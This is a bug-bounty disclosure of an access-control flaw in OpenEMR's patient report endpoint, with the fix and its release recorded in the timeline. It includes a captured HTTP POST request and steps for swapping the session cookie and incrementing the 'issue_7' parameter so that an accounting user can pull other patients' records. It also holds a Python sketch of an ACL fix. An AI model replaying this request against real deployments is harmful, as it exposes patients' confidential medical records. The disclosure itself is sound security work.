Accounting User Can Download Patient Reports in openemr in openemr/openemr

Valid

Reported on

Mar 11th 2022


Vulnerability Type

Insecure Direct Object Reference

Affected URL

https://localhost/openemr/interface/patient_file/report/custom_report.php

Affected Parameters

“issue_7”

Authentication Required?

Yes

Issue Summary

Non-privileged users (accounting and front-office) can download patient reports containing medical reports and documents by sending a request to the vulnerable end-point. No access control is enforced, so any authenticated OpenEMR user can download patient records simply by tampering with the “issue_7” parameter and setting it to any valid number. By incrementing this value, an unauthorized user can download patient records.

Recommendation

Implement an ACL check to ensure that only authorized users of the OpenEMR system are able to download patient documents from the vulnerable end-point.
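One way to realise this recommendation, shown here as an added illustration that is not OpenEMR's own code: a gate that first checks the requesting user's role against a permission to read medical records, then verifies that every issue id in the request (the slash-delimited issue_N=/id/ fields visible in the reproduction section) belongs to the patient currently selected in the session. The role table, the issue-ownership table and the function names are constructed stand-ins for this example.

```python
from urllib.parse import parse_qs

# Constructed stand-in for OpenEMR's ACL tables: only clinical roles may read
# medical records; accounting and front-office may not (hypothetical role names).
ROLE_CAN_READ_MEDICAL = {"admin": True, "clinician": True,
                         "accounting": False, "front_office": False}

# Constructed issue table: issue id -> id of the patient who owns it.
ISSUE_OWNER = {14: 1, 15: 2, 16: 2}

# Request body copied from the report's reproduction section (issue_7=/14/).
SAMPLE_BODY = ("include_demographics=demographics&include_billing=billing&pdf=1"
               "&issue_8=%2F&issue_10=%2F&issue_7=%2F14%2F&issue_6=%2F"
               "&issue_9=%2F&issue_11=%2F&issue_12=%2F")


def parse_issue_ids(body: str) -> set[int]:
    """Collect every id from issue_N=/a/b/ fields; a bare '/' means none selected."""
    ids = set()
    for key, values in parse_qs(body, keep_blank_values=True).items():
        if not key.startswith("issue_"):
            continue
        for value in values:
            for part in value.split("/"):
                if part.isdigit():
                    ids.add(int(part))
    return ids


def authorize_report(role: str, session_pid: int, body: str) -> tuple[bool, str]:
    """Allow the download only if the role may read medical records AND every
    requested issue belongs to the patient selected in the session.  The second
    check is what closes the IDOR: a permitted role still cannot reach another
    patient's issues by editing issue_7."""
    if not ROLE_CAN_READ_MEDICAL.get(role, False):
        return False, "role not permitted to read medical records"
    for issue_id in sorted(parse_issue_ids(body)):
        owner = ISSUE_OWNER.get(issue_id)
        if owner is None or owner != session_pid:
            return False, f"issue {issue_id} does not belong to patient {session_pid}"
    return True, "ok"


if __name__ == "__main__":
    print(authorize_report("accounting", 1, SAMPLE_BODY))  # denied by role
    print(authorize_report("clinician", 1, SAMPLE_BODY))   # allowed
    print(authorize_report("clinician", 2, SAMPLE_BODY))   # denied by ownership
```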

Credits

Aden Yap Chuen Zhen (chuenzhen.yap2@baesystems.com)
Rizan, Sheikh (rizan.sheikhmohdfauzi@baesystems.com)
Ali Radzali (muhammadali.radzali@baesystems.com)

Issue Reproduction

Log in to OpenEMR as Admin and capture the POST request to the following end-point:

https://localhost/openemr/interface/patient_file/report/custom_report.php

In Burp, the HTTP POST request, the “OpenEMR” cookie and the “issue_7” parameter can be tampered with.

Host: 192.168.0.141
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Origin: http://192.168.0.141
Connection: close
Referer: http://192.168.0.141/openemr/interface/patient_file/report/patient_report.php
Cookie: OpenEMR=E6toaL3R-180fA2-MIw80a-G7PJPCapZxrTYIzY%2Cofj5CXEG
Upgrade-Insecure-Requests: 1

include_demographics=demographics&include_billing=billing&pdf=1&issue_8=%2F&issue_10=%2F&issue_7=%2F14%2F&issue_6=%2F&issue_9=%2F&issue_11=%2F&issue_12=%2F

Replace the “OpenEMR” cookie with the Accountant's cookie and increment the “issue_7” parameter to any valid number, e.g. “issue_7=/15/”, to access patient documents.

We are processing your report and will contact the openemr team within 24 hours. (2 years ago)
r00t.pgp modified the report (2 years ago)
r00t.pgp modified the report (2 years ago)
We have contacted a member of the openemr team and are waiting to hear back. (2 years ago)
We have sent a follow up to the openemr team. We will try again in 4 days. (2 years ago)
openemr/openemr maintainer validated this vulnerability (2 years ago)
r00tpgp has been awarded the disclosure bounty
The fix bounty is now up for grabs
openemr/openemr maintainer (Maintainer), 2 years ago:

This has been fixed in master and rel-610 branches and will be in OpenEMR's next production release (6.1.0).

openemr/openemr maintainer (Maintainer), 2 years ago:

OpenEMR 6.1.0 was released today, which fixes this issue.

openemr/openemr maintainer marked this as fixed in 6.1.0 with commit a2e918 2 years ago
The fix bounty has been dropped
r00t.pgp (Researcher), 2 years ago:

Hi, kindly issue a CVE for this vulnerability. Tq

r00t.pgp (Researcher), 2 years ago:

Dear @admin, I've already pinged the maintainer; could you please follow up on the CVE creation? Tq

Dear @maintainer, could you kindly confirm that CVE can be created for this report? Tq

openemr/openemr maintainer (Maintainer), 2 years ago:

Hi, I consent to creation of CVE.

Jamie Slome, 2 years ago:

Sorted 👍
